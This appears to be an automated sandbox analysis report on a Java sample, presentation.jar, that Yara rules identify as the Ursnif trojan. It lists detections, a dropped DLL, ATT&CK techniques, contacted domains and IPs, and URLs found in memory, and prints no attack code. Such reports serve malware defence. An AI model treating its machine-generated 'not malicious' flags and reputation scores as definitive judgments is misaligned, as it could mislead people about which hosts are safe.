Source: Yara match	File source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000008.00000003.526878948.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.regsvr32.exe.3ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.regsvr32.exe.2f8d23.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Services File Permissions Weakness1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	DLL Side-Loading1	Services File Permissions Weakness1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution2	Logon Script (Windows)	DLL Side-Loading1	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Information Discovery24	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Services File Permissions Weakness1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
presentation.jar	23%	Virustotal		Browse
presentation.jar	9%	Metadefender		Browse
presentation.jar	6%	ReversingLabs	ByteCode-JAVA.Trojan.Alien

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\broker.dll	11%	ReversingLabs	Win32.Trojan.Babar

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
https://s2.go-mpulse.net/boomerang/	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl	0%	URL Reputation	safe
http://bugreport.sun.com/bugreport/	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://www.chambersign.orgs	0%	Avira URL Cloud	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://ocsp.sectigo.com	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class3P.crl	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://r3.o.lencr.org	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
consent-pref.trustarc.com	143.204.98.25	true	false	high
consent-st.trustarc.com	143.204.98.126	true	false	high
oracle.112.2o7.net	35.181.18.61	true	false	high
docs.cyberservices.biz	50.87.249.219	true	false	unknown
prefmgr-cookie.truste-svc.net	34.202.206.65	true	false	high
consent.trustarc.com	13.224.193.90	true	false	high
static.oracle.com	unknown	unknown	false	high
www.oracle.com	unknown	unknown	false	high
s.go-mpulse.net	unknown	unknown	false	unknown
c.oracleinfinity.io	unknown	unknown	false	unknown
684dd30c.akstat.io	unknown	unknown	false	unknown
www.java.com	unknown	unknown	false	high
c.go-mpulse.net	unknown	unknown	false	unknown
dc.oracleinfinity.io	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://s2.go-mpulse.net/boomerang/	~DFF893335E5A47C1F6.TMP.5.dr, en[1].htm.6.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ya.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://consent-pref.trustarc.com/defaultpreferencemanager/67B873F492AD87C25B322202223D7A22.cache.ht	~DFF893335E5A47C1F6.TMP.5.dr	false		high
http://www.chambersign.org1	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://repository.swisssign.com/0	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false		high
http://www.sogou.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://consent.trustarc.com/bannermsg?	notice[1].js.6.dr	false		high
http://fr.search.yahoo.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	java.exe, 00000002.00000002.385608317.0000000016480000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust	~DFF893335E5A47C1F6.TMP.5.dr	false		high
http://www.reddit.com/	msapplication.xml4.5.dr	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://policy.camerfirma.com0	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js	~DFF893335E5A47C1F6.TMP.5.dr	false		high
http://www.ya.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://bugs.webkit.org/show_bug.cgi?id=3810	67B873F492AD87C25B322202223D7A22.cache[1].htm.6.dr	false		high
http://www.etmall.com.tw/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.google.ru/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://cps.letsencrypt.org0	java.exe, 00000002.00000002.379938783.000000000A3A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certplus.com/CRL/class2.crl	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://bugreport.sun.com/bugreport/	java.exe, 00000002.00000002.379299472.0000000009FC5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://java.oracle.com/	java.exe, 00000002.00000002.379321886.0000000009FD5000.00000004.00000001.sdmp	false		high
http://search.naver.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.chambersign.orgs	java.exe, 00000002.00000002.378777753.0000000004E4E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://buscar.ozu.es/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://kr.search.yahoo.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.about.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://ocsp.sectigo.com	java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.igbusca.com.br/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.ask.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cjmall.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.certplus.com/CRL/class3P.crl	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.google.it/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://crl.securetrust.com/STCA.crl	java.exe, 00000002.00000002.379662544.000000000A1F3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://sads.myspace.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com	~DFF893335E5A47C1F6.TMP.5.dr	false		high
http://busca.buscape.com.br/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://consent.trustarc.com/log	notice[1].js.6.dr	false		high
http://uk.search.yahoo.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://r3.o.lencr.org	java.exe, 00000002.00000002.379990448.000000000A3E1000.00000004.00000001.sdmp, java.exe, 00000002.00000002.378881826.0000000004E7B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ozu.es/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	java.exe, 00000002.00000002.379414082.000000000A00F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.google.cz/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.soso.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.univision.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
http://www.amazon.com/	msapplication.xml.5.dr	false		high
http://images.joins.com/ui_c/fvc_joins.ico	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high
https://github.com/requirejs/requirejs/blob/master/LICENSE	renderer[1].js.6.dr	false		high
http://www.asharqalawsat.com/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	java.exe, 00000002.00000002.386964462.0000000016573000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.202.206.65	prefmgr-cookie.truste-svc.net	United States	14618	AMAZON-AESUS	false
50.87.249.219	docs.cyberservices.biz	United States	46606	UNIFIEDLAYER-AS-1US	false
35.181.18.61	oracle.112.2o7.net	United States	16509	AMAZON-02US	false
143.204.98.126	consent-st.trustarc.com	United States	16509	AMAZON-02US	false
13.224.193.90	consent.trustarc.com	United States	16509	AMAZON-02US	false
143.204.98.25	consent-pref.trustarc.com	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403821
Start date:	04.05.2021
Start time:	12:34:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	presentation.jar
Cookbook file name:	defaultwindowsfilecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Java) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.expl.winJAR@13/79@15/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.3% (good quality ratio 5%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .jar
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 13.64.90.137, 13.107.4.50, 104.42.151.234, 88.221.62.148, 104.83.83.17, 104.83.125.175, 92.122.246.223, 92.122.144.36, 88.221.62.65, 129.213.13.46, 104.83.83.83, 104.43.139.144, 20.82.210.154, 152.199.19.161, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 52.155.217.156, 40.64.101.146, 20.54.26.129, 184.30.24.56 Excluded domains from analysis (whitelisted): mw1eap.displaycatalog.md.mp.microsoft.com.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, ds-www.java.com.edgekey.net, au-bg-shim.trafficmanager.net, consumerrp-displaycatalog-aks2eap-uswest.md.mp.microsoft.com.akadns.net, ip46.go-mpulse.net.edgekey.net, fs.microsoft.com, e11123.g.akamaiedge.net, e2581.dscx.akamaiedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, displaycatalog-uswesteap.md.mp.microsoft.com.akadns.net, wildcard46.akstat.io.edgekey.net, ris.api.iris.microsoft.com, ds-oracle-microsites.edgekey.net, wildcard46.go-mpulse.net.edgekey.net, blobcollector.events.data.trafficmanager.net, dc.oracleinfinity.io.akadns.net, c.oracleinfinity.io.edgekey.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, 2-01-3cf7-0009.cdx.cedexis.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, arc.trafficmanager.net, e406.dscx.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, e4518.dscx.akamaiedge.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, ie9comview.vo.msecnd.net, e870.dscx.akamaiedge.net, c-0001.c-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, ds-www.oracle.com.edgekey.net, skypedataprdcoleus16.cloudapp.net, e4518.dscapi7.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
